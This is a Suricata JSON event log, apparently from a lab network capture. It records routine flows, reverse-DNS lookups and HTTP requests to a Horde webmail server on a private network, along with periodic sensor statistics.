{"timestamp":"2020-02-29T00:00:19.000671+0000","flow_id":1343567395055843,"event_type":"flow","src_ip":"192.168.10.130","src_port":34674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1164,"bytes_toclient":643,"start":"2020-02-28T23:59:12.944355+0000","end":"2020-02-28T23:59:18.097765+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:21.000249+0000","event_type":"stats","stats":{"uptime":13673,"capture":{"kernel_packets":131776,"kernel_drops":0},"decoder":{"pkts":131789,"bytes":91594733,"invalid":175,"ipv4":130374,"ipv6":8,"ethernet":131789,"raw":0,"null":0,"sll":0,"tcp":125441,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2210,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":6,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":75516,"memcap":0}}} {"timestamp":"2020-02-29T00:00:21.001336+0000","flow_id":481520212261976,"event_type":"flow","src_ip":"192.168.10.130","src_port":34670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":2135,"bytes_toclient":6655,"start":"2020-02-28T23:58:44.932952+0000","end":"2020-02-28T23:59:20.376358+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:21.747956+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:00:23.124284+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":1}} {"timestamp":"2020-02-29T00:00:24.004707+0000","flow_id":682082286951048,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-28T23:55:23.449160+0000","end":"2020-02-28T23:55:23.561958+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:25.000767+0000","flow_id":1255138313859760,"event_type":"flow","src_ip":"192.168.10.130","src_port":34676,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1894,"bytes_toclient":6334,"start":"2020-02-28T23:59:19.094896+0000","end":"2020-02-28T23:59:24.514097+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:28.000202+0000","event_type":"stats","stats":{"uptime":13680,"capture":{"kernel_packets":131791,"kernel_drops":0},"decoder":{"pkts":131794,"bytes":91595063,"invalid":175,"ipv4":130379,"ipv6":8,"ethernet":131794,"raw":0,"null":0,"sll":0,"tcp":125446,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":23758,"memcap":0}}} {"timestamp":"2020-02-29T00:00:31.230446+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51758,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29261,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:31.336274+0000","flow_id":987695000028206,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51758,"proto":"UDP","dns":{"type":"answer","id":29261,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:31.463043+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:31.478809+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52634,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:34.000269+0000","flow_id":153157065063796,"event_type":"flow","src_ip":"192.168.10.122","src_port":45902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:33.474484+0000","end":"2020-02-28T23:55:33.585976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:35.000227+0000","event_type":"stats","stats":{"uptime":13687,"capture":{"kernel_packets":131794,"kernel_drops":0},"decoder":{"pkts":131808,"bytes":91602696,"invalid":175,"ipv4":130393,"ipv6":8,"ethernet":131808,"raw":0,"null":0,"sll":0,"tcp":125458,"udp":4746,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2648,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2664,"synack":2655,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1696,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2162,"failed_udp":106},"tx":{"http":4376,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2238}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19177,"memcap_state":0,"memcap_global":0},"http":{"memuse":79802,"memcap":0}}} {"timestamp":"2020-02-29T00:00:36.479921+0000","flow_id":1537012727240391,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52634,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:37.879535+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43094,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4163,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:37.984947+0000","flow_id":243338513312687,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43094,"proto":"UDP","dns":{"type":"answer","id":4163,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:38.081444+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:00:38.092418+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52636,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414}} {"timestamp":"2020-02-29T00:00:41.000850+0000","flow_id":812859747239381,"event_type":"flow","src_ip":"192.168.10.122","src_port":57389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:40.689621+0000","end":"2020-02-28T23:55:40.802671+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:42.000177+0000","event_type":"stats","stats":{"uptime":13694,"capture":{"kernel_packets":131820,"kernel_drops":0},"decoder":{"pkts":131829,"bytes":91610721,"invalid":175,"ipv4":130412,"ipv6":8,"ethernet":131829,"raw":0,"null":0,"sll":0,"tcp":125475,"udp":4748,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2649,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2665,"synack":2656,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1697,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2163,"failed_udp":106},"tx":{"http":4377,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2239}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2212,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19176,"memcap_state":0,"memcap_global":0},"http":{"memuse":79860,"memcap":0}}} {"timestamp":"2020-02-29T00:00:42.001673+0000","flow_id":973732042355293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51531,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:41.176733+0000","end":"2020-02-28T23:55:41.284558+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:42.391403+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59919,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:42.592216+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734}} {"timestamp":"2020-02-29T00:00:43.093621+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52636,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:44.604989+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31014,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:44.908834+0000","flow_id":985912589424072,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:44.913706+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44624,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:45.980555+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":21109,"tx_id":0}} {"timestamp":"2020-02-29T00:00:45.989956+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31059,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.000124+0000","flow_id":2034129418565450,"event_type":"flow","src_ip":"192.168.10.81","src_port":52608,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-28T23:59:39.898890+0000","end":"2020-02-28T23:59:44.908679+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000341+0000","flow_id":1917856063927441,"event_type":"flow","src_ip":"192.168.10.81","src_port":52606,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":6,"bytes_toserver":747,"bytes_toclient":1857,"start":"2020-02-28T23:59:39.898193+0000","end":"2020-02-28T23:59:44.910626+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000416+0000","flow_id":376508265507704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52600,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":742,"bytes_toclient":798,"start":"2020-02-28T23:59:39.895864+0000","end":"2020-02-28T23:59:44.911116+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000484+0000","flow_id":106410657166283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52604,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1839,"bytes_toclient":7040,"start":"2020-02-28T23:59:39.897995+0000","end":"2020-02-28T23:59:44.919065+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000556+0000","flow_id":2223004900341093,"event_type":"flow","src_ip":"192.168.10.81","src_port":52598,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":1744,"bytes_toclient":13124,"start":"2020-02-28T23:59:39.734565+0000","end":"2020-02-28T23:59:44.918735+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000659+0000","flow_id":1630131894431570,"event_type":"flow","src_ip":"192.168.10.122","src_port":35446,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:45.536402+0000","end":"2020-02-28T23:55:45.644702+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:46.000727+0000","flow_id":1669280536703290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52602,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":40,"bytes_toserver":3859,"bytes_toclient":50594,"start":"2020-02-28T23:59:39.897338+0000","end":"2020-02-28T23:59:45.052284+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 